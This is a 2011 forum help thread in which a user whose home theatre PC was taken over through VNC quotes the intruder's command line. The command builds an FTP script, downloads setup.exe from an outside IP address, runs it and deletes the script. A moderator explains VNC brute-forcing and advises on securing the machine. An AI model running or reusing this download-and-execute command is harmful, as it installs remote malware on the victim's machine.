[Inactive] Run window - 'u got owned'?
Results 1 to 2 of 2

Thread: [Inactive] Run window - 'u got owned'?

  1. February 23rd, 2011, 05:12 AM #1
    mancastronaut
    mancastronaut is offline Virtual Med Student
    Join Date
    Feb 2011
    Posts
    1

    [Inactive] Run window - 'u got owned'?

    Strangest thing - last couple of days, whenever I have VNCd into my HTPC the task manager has been open. It's a new build, so I assumed it was just a quirk and I would get around to fixing it...

    This morning, I VNC in and the Run window is open with a message 'u got owned' and the following command had been run previously:

    "cmd /c echo open 202.82.202.142 21 >> ik &echo user ni**a temp >> ik &echo binary >> ik &echo get setup.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &setup.exe &exit"

    Now Windows Defender is popping up with a severe trojan threat: TrojanDownloader:BATFtper.gen

    Obviously I have removed it, bit WTF? How did this get past Windows Firewall and Windows Defender in the first place?
  2. February 23rd, 2011, 08:58 AM #2
    fink's Avatar
    fink
    fink is offline Site Moderator
    Join Date
    Jul 1998
    Location
    Toronto
    Posts
    25,463
    VNC is a good program but it's not very secure. When the host/server is running and waiting for someone to log in anyone looking for such an opportunity can hammer it with passwords to try and get in. There are "brute force" exploits that do this very quickly especially with simple passwords.

    That IP address when googled comes up a few times as being caught in honey traps... those are computers set up to trick people into trying to hack them.

    I would immediately turn off VNC and start using a more secure method to remote in to your computer. Windows Remote desktop for eg. Or you can set up a secure connection using VNC..

    eg- http://www.google.ca/search?q=vnc+se...816af2aa8c722d

    I would also immediately change any passwords you may have stored on that computer.

    It got past the firewall because it was set up to allow communication to the VNC program so it had no idea that the person trying
    to get in wasn't you. You can get more specific with firewall settings and set it up to only allow access from your specific remote address... but I'd still at least set up a secure pipe as well. Windows Defender or your a/v etc will not have any control over who can log into VNC and no a/v is perfect especially when the person planting the malware actually has control over the computer.

    To make sure that computer is now malware free follow the instructions in this thread..

    http://discussions.virtualdr.com/sho...d.php?t=167915

    and let us see the results below.

    VirtualDr email notices are not working.
    Check back regularly for responses.
    _____________________
    cat lovers click here
« Previous Thread | Next Thread »

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules